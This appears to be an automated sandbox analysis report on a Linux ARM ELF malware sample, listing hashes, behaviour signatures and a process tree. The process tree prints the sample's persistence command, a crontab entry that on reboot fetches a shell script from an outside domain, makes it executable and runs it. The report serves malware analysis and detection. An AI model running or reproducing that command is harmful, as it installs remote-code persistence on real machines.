Analysis

  • max time kernel
    149s
  • max time network
    140s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    27-10-2024 02:46

General

  • Target

    ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf

  • Size

    77KB

  • MD5

    5e6acfdb2b11d7a7d882bd937f763a79

  • SHA1

    3068bbeb0a17a20795406fc5b345fb6eb3a9fbc3

  • SHA256

    ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645

  • SHA512

    c84f873b1de729646afeed0bffe4d6ea919d01349f38e2e0190622ef7cf010a12cfd88c431ef2e023d2ac6549c9e9dbdededcc2cc37761e4eac4de37a592d739

  • SSDEEP

    1536:SKV6w6WzfWjQ0tDH28OB62JFhSJdPRW7CV/v7:SKV6ezf30tDW9B62byx7

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads runtime system information 47 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
    /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:655
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:656
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:658
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:660

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /var/spool/cron/crontabs/tmp.wNhaz5

    Filesize

    306B

    MD5

    a7092eb6aa79161f5a3758d751aae1b3

    SHA1

    0f3e2f380e53ee3e3c412b75715939031fa40b04

    SHA256

    f6cd9800f1a8a1025b04977d62bcaf5f0d4642f8822ea73db53b5d986d576ac4

    SHA512

    02ea889ecb85f5ee111b8c7cc9937423214e809d1edbe85cedb8984e9dbc0a2c49561ca9159d468216bb27617211d74b80f2aefab34b2199b7e007eb7b487ba0